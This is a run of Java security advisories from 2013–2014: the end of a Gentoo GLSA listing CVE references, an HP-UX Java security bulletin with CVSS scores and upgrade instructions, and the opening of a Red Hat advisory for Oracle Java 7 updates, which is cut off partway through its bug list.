[ 94 ] CVE-2013-1563
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1563
[ 95 ] CVE-2013-1564
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1564
[ 96 ] CVE-2013-1569
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1569
[ 97 ] CVE-2013-1571
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1571
[ 98 ] CVE-2013-2383
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2383
[ 99 ] CVE-2013-2384
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2384
[ 100 ] CVE-2013-2394
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2394
[ 101 ] CVE-2013-2400
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2400
[ 102 ] CVE-2013-2407
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2407
[ 103 ] CVE-2013-2412
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2412
[ 104 ] CVE-2013-2414
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2414
[ 105 ] CVE-2013-2415
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2415
[ 106 ] CVE-2013-2416
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2416
[ 107 ] CVE-2013-2417
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2417
[ 108 ] CVE-2013-2418
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2418
[ 109 ] CVE-2013-2419
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2419
[ 110 ] CVE-2013-2420
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2420
[ 111 ] CVE-2013-2421
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2421
[ 112 ] CVE-2013-2422
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2422
[ 113 ] CVE-2013-2423
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2423
[ 114 ] CVE-2013-2424
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2424
[ 115 ] CVE-2013-2425
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2425
[ 116 ] CVE-2013-2426
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2426
[ 117 ] CVE-2013-2427
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2427
[ 118 ] CVE-2013-2428
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2428
[ 119 ] CVE-2013-2429
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2429
[ 120 ] CVE-2013-2430
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2430
[ 121 ] CVE-2013-2431
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2431
[ 122 ] CVE-2013-2432
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2432
[ 123 ] CVE-2013-2433
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2433
[ 124 ] CVE-2013-2434
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2434
[ 125 ] CVE-2013-2435
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2435
[ 126 ] CVE-2013-2436
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2436
[ 127 ] CVE-2013-2437
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2437
[ 128 ] CVE-2013-2438
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2438
[ 129 ] CVE-2013-2439
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2439
[ 130 ] CVE-2013-2440
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2440
[ 131 ] CVE-2013-2442
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2442
[ 132 ] CVE-2013-2443
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2443
[ 133 ] CVE-2013-2444
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2444
[ 134 ] CVE-2013-2445
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2445
[ 135 ] CVE-2013-2446
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2446
[ 136 ] CVE-2013-2447
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2447
[ 137 ] CVE-2013-2448
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2448
[ 138 ] CVE-2013-2449
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2449
[ 139 ] CVE-2013-2450
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2450
[ 140 ] CVE-2013-2451
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2451
[ 141 ] CVE-2013-2452
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2452
[ 142 ] CVE-2013-2453
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2453
[ 143 ] CVE-2013-2454
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2454
[ 144 ] CVE-2013-2455
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2455
[ 145 ] CVE-2013-2456
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2456
[ 146 ] CVE-2013-2457
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2457
[ 147 ] CVE-2013-2458
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2458
[ 148 ] CVE-2013-2459
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2459
[ 149 ] CVE-2013-2460
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2460
[ 150 ] CVE-2013-2461
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2461
[ 151 ] CVE-2013-2462
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2462
[ 152 ] CVE-2013-2463
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2463
[ 153 ] CVE-2013-2464
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2464
[ 154 ] CVE-2013-2465
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2465
[ 155 ] CVE-2013-2466
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2466
[ 156 ] CVE-2013-2467
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2467
[ 157 ] CVE-2013-2468
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2468
[ 158 ] CVE-2013-2469
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2469
[ 159 ] CVE-2013-2470
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2470
[ 160 ] CVE-2013-2471
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2471
[ 161 ] CVE-2013-2472
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2472
[ 162 ] CVE-2013-2473
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2473
[ 163 ] CVE-2013-3743
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3743
[ 164 ] CVE-2013-3744
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3744
[ 165 ] CVE-2013-3829
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3829
[ 166 ] CVE-2013-5772
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5772
[ 167 ] CVE-2013-5774
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5774
[ 168 ] CVE-2013-5775
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5775
[ 169 ] CVE-2013-5776
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5776
[ 170 ] CVE-2013-5777
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5777
[ 171 ] CVE-2013-5778
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5778
[ 172 ] CVE-2013-5780
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5780
[ 173 ] CVE-2013-5782
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5782
[ 174 ] CVE-2013-5783
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5783
[ 175 ] CVE-2013-5784
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5784
[ 176 ] CVE-2013-5787
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5787
[ 177 ] CVE-2013-5788
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5788
[ 178 ] CVE-2013-5789
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5789
[ 179 ] CVE-2013-5790
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5790
[ 180 ] CVE-2013-5797
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5797
[ 181 ] CVE-2013-5800
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5800
[ 182 ] CVE-2013-5801
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5801
[ 183 ] CVE-2013-5802
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5802
[ 184 ] CVE-2013-5803
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5803
[ 185 ] CVE-2013-5804
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5804
[ 186 ] CVE-2013-5805
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5805
[ 187 ] CVE-2013-5806
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5806
[ 188 ] CVE-2013-5809
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5809
[ 189 ] CVE-2013-5810
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5810
[ 190 ] CVE-2013-5812
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5812
[ 191 ] CVE-2013-5814
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5814
[ 192 ] CVE-2013-5817
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5817
[ 193 ] CVE-2013-5818
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5818
[ 194 ] CVE-2013-5819
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5819
[ 195 ] CVE-2013-5820
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5820
[ 196 ] CVE-2013-5823
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5823
[ 197 ] CVE-2013-5824
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5824
[ 198 ] CVE-2013-5825
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5825
[ 199 ] CVE-2013-5829
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5829
[ 200 ] CVE-2013-5830
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5830
[ 201 ] CVE-2013-5831
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5831
[ 202 ] CVE-2013-5832
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5832
[ 203 ] CVE-2013-5838
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5838
[ 204 ] CVE-2013-5840
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5840
[ 205 ] CVE-2013-5842
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5842
[ 206 ] CVE-2013-5843
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5843
[ 207 ] CVE-2013-5844
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5844
[ 208 ] CVE-2013-5846
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5846
[ 209 ] CVE-2013-5848
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5848
[ 210 ] CVE-2013-5849
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5849
[ 211 ] CVE-2013-5850
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5850
[ 212 ] CVE-2013-5851
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5851
[ 213 ] CVE-2013-5852
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5852
[ 214 ] CVE-2013-5854
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5854
[ 215 ] CVE-2013-5870
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5870
[ 216 ] CVE-2013-5878
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5878
[ 217 ] CVE-2013-5887
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5887
[ 218 ] CVE-2013-5888
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5888
[ 219 ] CVE-2013-5889
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5889
[ 220 ] CVE-2013-5893
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5893
[ 221 ] CVE-2013-5895
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5895
[ 222 ] CVE-2013-5896
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5896
[ 223 ] CVE-2013-5898
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5898
[ 224 ] CVE-2013-5899
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5899
[ 225 ] CVE-2013-5902
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5902
[ 226 ] CVE-2013-5904
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5904
[ 227 ] CVE-2013-5905
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5905
[ 228 ] CVE-2013-5906
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5906
[ 229 ] CVE-2013-5907
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5907
[ 230 ] CVE-2013-5910
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5910
[ 231 ] CVE-2014-0368
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0368
[ 232 ] CVE-2014-0373
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0373
[ 233 ] CVE-2014-0375
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0375
[ 234 ] CVE-2014-0376
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0376
[ 235 ] CVE-2014-0382
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0382
[ 236 ] CVE-2014-0385
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0385
[ 237 ] CVE-2014-0387
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0387
[ 238 ] CVE-2014-0403
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0403
[ 239 ] CVE-2014-0408
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0408
[ 240 ] CVE-2014-0410
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0410
[ 241 ] CVE-2014-0411
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0411
[ 242 ] CVE-2014-0415
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0415
[ 243 ] CVE-2014-0416
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0416
[ 244 ] CVE-2014-0417
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0417
[ 245 ] CVE-2014-0418
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0418
[ 246 ] CVE-2014-0422
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0422
[ 247 ] CVE-2014-0423
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0423
[ 248 ] CVE-2014-0424
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0424
[ 249 ] CVE-2014-0428
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0428
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-201401-30.xml
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.
License
=======
Copyright 2014 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Note: the current version of the following document is available here:
https://h20566.www2.hp.com/portal/site/hpsc/public/kb/
docDisplay?docId=emr_na-c03725347
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c03725347
Version: 1
HPSBUX02864 SSRT101156 rev.1 - HP-UX Running Java, Remote Unauthorized
Access, Disclosure of Information, and Other Vulnerabilities
NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.
Release Date: 2013-04-03
Last Updated: 2013-04-03
Potential Security Impact: Remote unauthorized access, disclosure of
information, and other vulnerabilities
Source: Hewlett-Packard Company, HP Software Security Response Team
VULNERABILITY SUMMARY
Potential security vulnerabilities have been identified in Java Runtime
Environment (JRE) and Java Developer Kit (JDK) running on HP-UX. These
vulnerabilities could allow remote unauthorized access, disclosure of
information, and other exploits.
References: CVE-2012-1541, CVE-2012-3213, CVE-2012-3342, CVE-2013-0351,
CVE-2013-0409, CVE-2013-0419, CVE-2013-0423, CVE-2013-0424, CVE-2013-0425,
CVE-2013-0426, CVE-2013-0427, CVE-2013-0428, CVE-2013-0429, CVE-2013-0432,
CVE-2013-0433, CVE-2013-0434, CVE-2013-0435, CVE-2013-0438, CVE-2013-0440,
CVE-2013-0441, CVE-2013-0442, CVE-2013-0443, CVE-2013-0445, CVE-2013-0446,
CVE-2013-0450, CVE-2013-0809, CVE-2013-1473, CVE-2013-1475, CVE-2013-1476,
CVE-2013-1478, CVE-2013-1480, CVE-2013-1481, CVE-2013-1493
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP-UX B.11.11, B.11.23, and B.11.31 running HP JDK and JRE v6.0.17 and
earlier
BACKGROUND
CVSS 2.0 Base Metrics
===========================================================
Reference Base Vector Base Score
CVE-2012-1541 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2012-3213 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2012-3342 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-0351 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5
CVE-2013-0409 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0
CVE-2013-0419 (AV:N/AC:H/Au:N/C:C/I:C/A:C) 7.6
CVE-2013-0423 (AV:N/AC:H/Au:N/C:C/I:C/A:C) 7.6
CVE-2013-0424 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0
CVE-2013-0425 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-0426 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-0427 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0
CVE-2013-0428 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-0429 (AV:N/AC:H/Au:N/C:C/I:C/A:C) 7.6
CVE-2013-0432 (AV:N/AC:L/Au:N/C:P/I:P/A:N) 6.4
CVE-2013-0433 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0
CVE-2013-0434 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0
CVE-2013-0435 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0
CVE-2013-0438 (AV:N/AC:M/Au:N/C:P/I:N/A:N) 4.3
CVE-2013-0440 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0
CVE-2013-0441 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-0442 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-0443 (AV:N/AC:H/Au:N/C:P/I:P/A:N) 4.0
CVE-2013-0445 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-0446 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-0450 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-0809 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-1473 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0
CVE-2013-1475 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-1476 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-1478 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-1480 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-1481 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-1493 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
===========================================================
Information on CVSS is documented
in HP Customer Notice: HPSN-2008-002
RESOLUTION
HP has provided the following Java version upgrade to resolve these
vulnerabilities.
The upgrade is available from the following location
http://www.hp.com/java
OS Version
Release Version
HP-UX B.11.11, B.11.23, B.11.31
JDK and JRE v6.0.18 or subsequent
MANUAL ACTIONS: Yes - Update
For Java v6.0 update to Java v6.0.18 or subsequent
PRODUCT SPECIFIC INFORMATION
HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application
that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins
issued by HP and lists recommended actions that may apply to a specific HP-UX
system. It can also download patches and create a depot automatically. For
more information see https://www.hp.com/go/swa
The following text is for use by the HP-UX Software Assistant.
AFFECTED VERSIONS
HP-UX B.11.11
HP-UX B.11.23
===========
Jdk60.JDK60-COM
Jdk60.JDK60-PA20
Jdk60.JDK60-PA20W
Jre60.JRE60-COM
Jre60.JRE60-COM-DOC
Jre60.JRE60-PA20
Jre60.JRE60-PA20-HS
Jre60.JRE60-PA20W
Jre60.JRE60-PA20W-HS
Jdk60.JDK60-IPF32
Jdk60.JDK60-IPF64
Jre60.JRE60-COM
Jre60.JRE60-IPF32
Jre60.JRE60-IPF32-HS
Jre60.JRE60-IPF64
Jre60.JRE60-IPF64-HS
action: install revision 1.6.0.18.00 or subsequent
HP-UX B.11.23
HP-UX B.11.31
===========
Jdk60.JDK60-COM
Jdk60.JDK60-IPF32
Jdk60.JDK60-IPF64
Jre60.JRE60-IPF32
Jre60.JRE60-IPF32-HS
Jre60.JRE60-IPF64
Jre60.JRE60-IPF64-HS
Jre60.JRE60-COM
Jre60.JRE60-IPF32
Jre60.JRE60-IPF32-HS
Jre60.JRE60-IPF64
Jre60.JRE60-IPF64-HS
action: install revision 1.6.0.18.00 or subsequent
END AFFECTED VERSIONS
HISTORY
Version:1 (rev.1) - 3 April 2013 Initial release
Third Party Security Patches: Third party security patches that are to be
installed on systems running HP software products should be applied in
accordance with the customer's patch management policy.
Support: For issues about implementing the recommendations of this Security
Bulletin, contact normal HP Services support channel. For other issues about
the content of this Security Bulletin, send e-mail to security-alert@hp.com.
Report: To report a potential security vulnerability with any HP supported
product, send Email to: security-alert@hp.com
Subscribe: To initiate a subscription to receive future HP Security Bulletin
alerts via Email:
http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins
Security Bulletin List: A list of HP Security Bulletins, updated
periodically, is contained in HP Security Notice HPSN-2011-001:
https://h20566.www2.hp.com/portal/site/hpsc/public/kb/
docDisplay?docId=emr_na-c02964430
Security Bulletin Archive: A list of recently released Security Bulletins is
available here:
http://h20566.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/
Software Product Category: The Software Product Category is represented in
the title by the two characters following HPSB.
3C = 3COM
3P = 3rd Party Software
GN = HP General Software
HF = HP Hardware and Firmware
MP = MPE/iX
MU = Multi-Platform Software
NS = NonStop Servers
OV = OpenVMS
PI = Printing and Imaging
PV = ProCurve
ST = Storage Software
TU = Tru64 UNIX
UX = HP-UX
Copyright 2013 Hewlett-Packard Development Company, L.P.
Hewlett-Packard Company shall not be liable for technical or editorial errors
or omissions contained herein. The information provided is provided "as is"
without warranty of any kind. To the extent permitted by law, neither HP or
its affiliates, subcontractors or suppliers will be liable for
incidental,special or consequential damages including downtime cost; lost
profits;damages relating to the procurement of substitute products or
services; or damages for loss of data, or software restoration. The
information in this document is subject to change without notice.
Hewlett-Packard Company and the names of Hewlett-Packard products referenced
herein are trademarks of Hewlett-Packard Company in the United States and
other countries. Other product and company names mentioned herein may be
trademarks of their respective owners. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
=====================================================================
Red Hat Security Advisory
Synopsis: Critical: java-1.7.0-oracle security update
Advisory ID: RHSA-2013:0237-01
Product: Red Hat Enterprise Linux Extras
Advisory URL: https://rhn.redhat.com/errata/RHSA-2013-0237.html
Issue date: 2013-02-04
CVE Names: CVE-2012-1541 CVE-2012-3213 CVE-2012-3342
CVE-2013-0351 CVE-2013-0409 CVE-2013-0419
CVE-2013-0423 CVE-2013-0424 CVE-2013-0425
CVE-2013-0426 CVE-2013-0427 CVE-2013-0428
CVE-2013-0429 CVE-2013-0430 CVE-2013-0431
CVE-2013-0432 CVE-2013-0433 CVE-2013-0434
CVE-2013-0435 CVE-2013-0437 CVE-2013-0438
CVE-2013-0440 CVE-2013-0441 CVE-2013-0442
CVE-2013-0443 CVE-2013-0444 CVE-2013-0445
CVE-2013-0446 CVE-2013-0448 CVE-2013-0449
CVE-2013-0450 CVE-2013-1473 CVE-2013-1475
CVE-2013-1476 CVE-2013-1478 CVE-2013-1479
CVE-2013-1480 CVE-2013-1489
=====================================================================
1. Summary:
Updated java-1.7.0-oracle packages that fix several security issues are now
available for Red Hat Enterprise Linux 5 and 6 Supplementary.
The Red Hat Security Response Team has rated this update as having critical
security impact. Common Vulnerability Scoring System (CVSS) base scores,
which give detailed severity ratings, are available for each vulnerability
from the CVE links in the References section.
2. Relevant releases/architectures:
Red Hat Enterprise Linux Desktop Supplementary (v. 5) - i386, x86_64
Red Hat Enterprise Linux Desktop Supplementary (v. 6) - i386, x86_64
Red Hat Enterprise Linux HPC Node Supplementary (v. 6) - x86_64
Red Hat Enterprise Linux Server Supplementary (v. 5) - i386, x86_64
Red Hat Enterprise Linux Server Supplementary (v. 6) - i386, x86_64
Red Hat Enterprise Linux Workstation Supplementary (v. 6) - i386, x86_64
3. Further
information about these flaws can be found on the Oracle Java SE Critical
Patch Update Advisory page, listed in the References section.
(CVE-2012-1541, CVE-2012-3213, CVE-2012-3342, CVE-2013-0351, CVE-2013-0409,
CVE-2013-0419, CVE-2013-0423, CVE-2013-0424, CVE-2013-0425, CVE-2013-0426,
CVE-2013-0427, CVE-2013-0428, CVE-2013-0429, CVE-2013-0430, CVE-2013-0431,
CVE-2013-0432, CVE-2013-0433, CVE-2013-0434, CVE-2013-0435, CVE-2013-0437,
CVE-2013-0438, CVE-2013-0440, CVE-2013-0441, CVE-2013-0442, CVE-2013-0443,
CVE-2013-0444, CVE-2013-0445, CVE-2013-0446, CVE-2013-0448, CVE-2013-0449,
CVE-2013-0450, CVE-2013-1473, CVE-2013-1475, CVE-2013-1476, CVE-2013-1478,
CVE-2013-1479, CVE-2013-1480, CVE-2013-1489)
All users of java-1.7.0-oracle are advised to upgrade to these updated
packages, which provide Oracle Java 7 Update 13 and resolve these issues.
All running instances of Oracle Java must be restarted for the update to
take effect.
4. Solution:
Before applying this update, make sure all previously-released errata
relevant to your system have been applied.
This update is available via the Red Hat Network. Details on how to
use the Red Hat Network to apply this update are available at
https://access.redhat.com/knowledge/articles/11258
5. Bugs fixed (http://bugzilla.redhat.com/):
859140 - CVE-2013-0440 OpenJDK: CPU consumption DoS via repeated SSL ClientHello packets (JSSE, 7192393)
860652 - CVE-2013-1475 OpenJDK: IIOP type reuse sandbox bypass (CORBA, 8000540, SE-2012-01 Issue 50)
906447 - CVE-2013-0431 OpenJDK: JMX Introspector missing package access check (JMX, 8000539, SE-2012-01 Issue 52)
906449 - CVE-2013-1489 Oracle JDK 7: bypass of the security level setting in browser plugin (Deployment, SE-2012-01 Issue 53)
906813 - CVE-2013-0424 OpenJDK: RMI CGIHandler XSS issue (RMI, 6563318)
906892 - CVE-2013-0435 OpenJDK: com.sun.xml.internal.* not restricted packages (JAX-WS, 7201068)
906894 - CVE-2013-1478 OpenJDK: image parser insufficient raster parameter checks (2D, 8001972)
906899 - CVE-2013-0442 OpenJDK: insufficient privilege checking issue (AWT, 7192977)
906900 - CVE-2013-0445 OpenJDK: insufficient privilege checking issue (AWT, 8001057)
906904 - CVE-2013-1480 OpenJDK: image parser insufficient raster parameter checks (AWT, 8002325)
906911 - CVE-2013-0450 OpenJDK: RequiredModelMBean missing access control context checks (JMX, 8000537)
906914 - CVE-2012-1541 Oracle JDK: unspecified vulnerability fixed in 6u39 and 7u13 (Deployment)
906916 - CVE-2013-0446 Oracle JDK: unspecified vulnerability fixed in 6u39 and 7u13 (Deployment)
906917 - CVE-2012-3342 Oracle JDK: unspecified vulnerability fixed in 6u39 and 7u13 (Deployment)
906918 - CVE-2013-0419 Oracle JDK: unspecified vulnerability fixed in 6u39 and 7u13 (Deployment)
906921 - CVE-2013-0423 Oracle JDK: unspecified vulnerability fixed in 6u39 and 7u13 (Deployment)
906923 - CVE-2013-0351 Oracle JDK: unspecified vulnerability fixed in 6u39 and 7u13 (Deployment)
906930 - CVE-2013-0430 Oracle JDK: unspecified vulnerability fixed in 6u39 and 7u13 (Install)
906932 - CVE-2013-0449 Oracle JDK: unspecified vulnerability fixed in 7u13 (Deployment)
906933 - CVE-2013-1473 Oracle JDK: unspecified vulnerability fixed in 6u39 and 7u13 (Deployment)
906934 - CVE-2013-0448 Oracle JDK: unspecified vulnerability fixed in 7u13 (Libraries)
